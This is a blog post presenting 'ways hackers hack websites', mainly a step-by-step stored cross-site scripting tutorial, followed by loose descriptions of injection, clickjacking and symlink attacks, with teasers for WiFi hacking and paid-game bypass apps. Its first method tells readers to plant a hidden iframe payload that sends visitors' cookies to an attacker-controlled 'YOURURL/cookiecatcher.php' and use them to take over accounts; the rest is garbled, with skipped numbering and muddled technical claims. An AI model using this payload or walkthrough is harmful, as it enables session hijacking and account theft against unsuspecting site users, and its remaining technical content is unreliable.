Skip to main content

Best Possible Ways That Hackers Used To Hack Websites

                   
         

Note:-  Article is only for knowledge and research purpose, do not use it in any illegal way, i am not responsible for anything happen.

Method 1: Using Cross Site Scripting

Step 1:First step to be followed i to find a vulnerable site where yo can post your text. if the site is secure then this will not work.window.alert(“test”)window.alert(“test”)window.alert(“test”)

Step 2:Now create a post and write some special code into the “post” which will capture the data of all who click on it. Test the system if it filters out code. Post <script>window.alert(“test”)</script>

If an alert box appears in front of you then the site is vulnerable to attack.

Step 3: Create and upload your cookie catcher.
The main idea to create this is to capture a user’s cookie which helps in accessing to their account for websites with vulnerable logins. For this, you need a cookie catcher which will capture your target’s cookies and divert them. Upload the catcher to a website you have accessed to and that supports php too.

Step 4:Post with your cookie catcher.
Input the code into the post which will capture the cookies and sent them to your site too. You wishe to put in some text after the code to reduce suspicion and keep it away from deleting.
An example code would look like

<iframe frameborder=”0″ height=”0″ width=”0″ src=”javascript…:void(document.location=’YOURURL/cookiecatcher.php?c=’ document.cookie)></iframe>

Method 2: Executing Injection Attacks

Step 1:If you really want to learn how to hack websites you must know one or two languages like Python or SQL and how computers and technologies work for the better control of computers and to find vulnerabilities in system.

Step 2:You must be familiar about HTML literacy and Java Script to hack websites in particular.

Step 3: You must consult with whitehats. These are the hackers who use their powers for good, exposing security vulnerabilities. If you want to hack websites and protect your own site, must contact with the whitehats.

Step 4: Research hacking. To protect your own site or to learn hacking, you must be trained in field of researching. There are many was and list keeps on changing.

Sep 5: Keep up to date. As the list keeps on changing , you must be sure that you are up to date. If you are protected from certain types of hack then only you are safe in future.

Method 4: ClickJacking Attacks

ClickJacking is also called a UI Redress Attack . It is this when a hacker uses multiple opaque layers to trick a user into clicking the top layer without knowing them.  The attacker is “hijacking” that is not meant for the actual page loaded but for a page where the attacker wants you to be. Let us take an example i.e using a carefully crafted combinations of stylesheets,iframes and text boxes. By this a user can led to believe they are typing in the password for bank account but they are writing into an invisible space that is controlled by the attacker which is not visible to the user.

Method 5: SYMLINKING


A symlink is a special file that “points to” a hard link on a mounted file system. A symlinking attack occurs when a hacker places the symlink in such a way that the user access the endpoint thinks they are accessing the correct file.

If the endpoint file is an output, the consequence of the symlink attack is that it can be easily modified alternatively of the file at the deliberate location. Modifications include like appending, overwriting,corrupting or even changing permissions.

In various situations, hacker may be able to control the changes to a file, grant themselves approach access, insert wrong information, reveal sensitive information or destroy vital system or files or applications. And therefore better is to secure your websites.


Comments

Popular posts from this blog

Shorten your link and get paid [100% working]

What is shorte.st 1 .  Shorte.st  is a European based link shortener tool that is connected with advertising network so  that we get paid when we shorten a link and make someone clicks on it. 2. Unlike other link shortener sites, Shorte.st is the best and easy way to earn some good money. How to Register with Shorte.st – 1. Visit  This link ,  click the  “Join” tab in the upper-right side. 2. You will see a form with 3 fields that you need to fill – Email address, Confirm Email and Password 3. Click the  “Register”  button . 4. That’s it you have successfully register to Shorte.st. Use above mentioned link to register or else you cant register to Shorte.st.   Below are the steps you need to follow to Shorten any link and get paid by using Shorte. Steps to shorten any link and get paid in Shorte – 1. First of all, copy your any link and paste it in the box which is located after the Ninja head and then click on  “Shorten”  button. 2. After cl

How To Hack Wifi Using Kali Linux

How To Hack Wifi Using Kali Linux Kali linux :- Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali Linux is a complete re-build of BackTrack from the ground up, adhering completely to Debian development standards. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company. Kali contains several hundred tools aimed at various information security tasks, such as  Penetration Testing, Forensics and Reverse Engineering. the main features of Kali linux are:- Free to use by anyone all around he world and it will always be free Wide-ranging wireless device support Open source Git tree Completely customizable Multi-language support 600+ penetration testing tools Custom kernel, patched for injection How to hack wifi using kali linux:- Kali linux provide various techniques for security testing and penetration. u

How To Hack Games in Android without Rooting

Hack Games in Android without Rooting The applications that help in hacking android games without rooting are:- Creehack Creehack is the ideal game programmer application android apparatus that you require on the off chance that you need to appreciate playing loads of video games on your Android gadget for nothing. Typically, numerous video games require that you make buys if you need to appreciate every one of the components of the diversion. With Creehack, you can sidestep every one of the impediments and after that make the most of your most loved diversion without making the buy. It Can sidestep all App installment necessities and Allows for boundless In-App buys It Does not require root access and is good with all applications It permits them to play various diversions effective without making expensive buys. LeoPlay Card The LeoPlay Card is another incredible diversion programmer android instrument that will permit